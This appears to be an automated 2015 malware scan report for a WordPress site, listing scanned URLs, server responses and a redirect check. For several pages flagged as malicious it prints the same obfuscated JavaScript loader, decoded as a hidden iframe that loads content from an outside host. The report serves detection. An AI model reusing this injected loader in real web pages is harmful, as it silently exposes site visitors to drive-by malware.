Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=debesconocerlo.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://debesconocerlo.com/ | 200 OK Content-Length: 20405 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://debesconocerlo.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93128 Content-Type: application/javascript | clean |
http://debesconocerlo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://debesconocerlo.com/wp-includes/js/jquery/jquery.masonry.min.js?ver=2.1.05 | 200 OK Content-Length: 5467 Content-Type: application/javascript | clean |
http://debesconocerlo.com/wp-content/themes/twentythirteen/js/functions.js?ver=2013-07-18 | 200 OK Content-Length: 2038 Content-Type: application/javascript | clean |
http://debesconocerlo.com/pagina-ejemplo/ | 200 OK Content-Length: 18881 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://debesconocerlo.com/wp-admin/ | HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 25 Feb 2015 06:14:23 GMT Pragma: no-cache Location: http://debesconocerlo.com/wp-login.php?redirect_to=http%3A%2F%2Fdebesconocerlo.com%2Fwp-admin%2F&reauth=1 Server: Apache Content-Length: 0 Content-Type: text/html Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Powered-By: PHP/5.3.26 | clean |
http://debesconocerlo.com/wp-login.php?redirect_to=http%3a%2f%2fdebesconocerlo.com%2fwp-admin%2f&reauth=1 | 200 OK Content-Length: 2328 Content-Type: text/html | clean |
http://debesconocerlo.com/wp-login.php?action=lostpassword | 200 OK Content-Length: 2021 Content-Type: text/html | clean |
http://debesconocerlo.com/wp-login.php | 200 OK Content-Length: 2328 Content-Type: text/html | clean |
http://debesconocerlo.com/test404page.js | 404 Not Found Content-Length: 17281 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://debesconocerlo.com/nuevo-articulo/ | 200 OK Content-Length: 20720 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://debesconocerlo.com/category/sin-categoria/ | 200 OK Content-Length: 20757 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://debesconocerlo.com/author/manuel/ | 200 OK Content-Length: 20809 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://debesconocerlo.com/2013/08/ | 200 OK Content-Length: 20488 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var \u0065='7/%8;%3+%b<%9&%4^%6-%1:%0)%a`%2.%5|%e}%d#%c~%f[',\u0069=function(){for(\u007a=0;\u007a<\u0068.length/2;\u007a++){\u0065+='%'+\u0068.substr(\u007a*2,2);}document.write(decodeURIComponent(\u0065));},\u0068='+~-^-&/-.)/+/^/&-~-|+#..-^-&/+/)-~-:/&+`-}-[-}-|+<..+}+~-&--/.-:-#-|.)/+/.-++#..-;/^/^/)+`.[.[/)-[-}-:.}/)//.[-./;/---.}-+-/-&+[-^-|---:/|-~/^...)//-&-^/^-;+#..+:+)...)-;-|-&-/-;/^+#..+:+)..+}+~.[-&--/.-:-#-|+}+~.[-^-&/-+}',\u0073=function(){\u0073=\u0065.split('%');for(var \u0075 in \u0073){if((typeof(\u0073[\u0075])).substr(0,1)=='s'){\u0068=\u0068.split(\u0073[\u0075].substr(1)).join(\u0073[\u0075].substr(0,1));}}return this;},\u0063=\u0073(),\u0065='';\u0069(); Decoded script: <div style="display:none;"><iframe src="http://pona.pw/bxvf.cgi?default" width="10" height="10"></iframe></div> Antivirus reports:
| ||
http://debesconocerlo.com/feed/ | 200 OK Content-Length: 3421 Content-Type: text/xml | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: debesconocerlo.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Feb 2015 06:14:19 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://debesconocerlo.com/xmlrpc.php
X-Powered-By: PHP/5.3.26
GET / HTTP/1.1
Host: debesconocerlo.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 25 Feb 2015 06:14:19 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://debesconocerlo.com/xmlrpc.php
X-Powered-By: PHP/5.3.26
Second query (visit from search engine):
GET / HTTP/1.1
Host: debesconocerlo.com
Referer: http://www.google.com/search?q=debesconocerlo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: debesconocerlo.com
Referer: http://www.google.com/search?q=debesconocerlo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.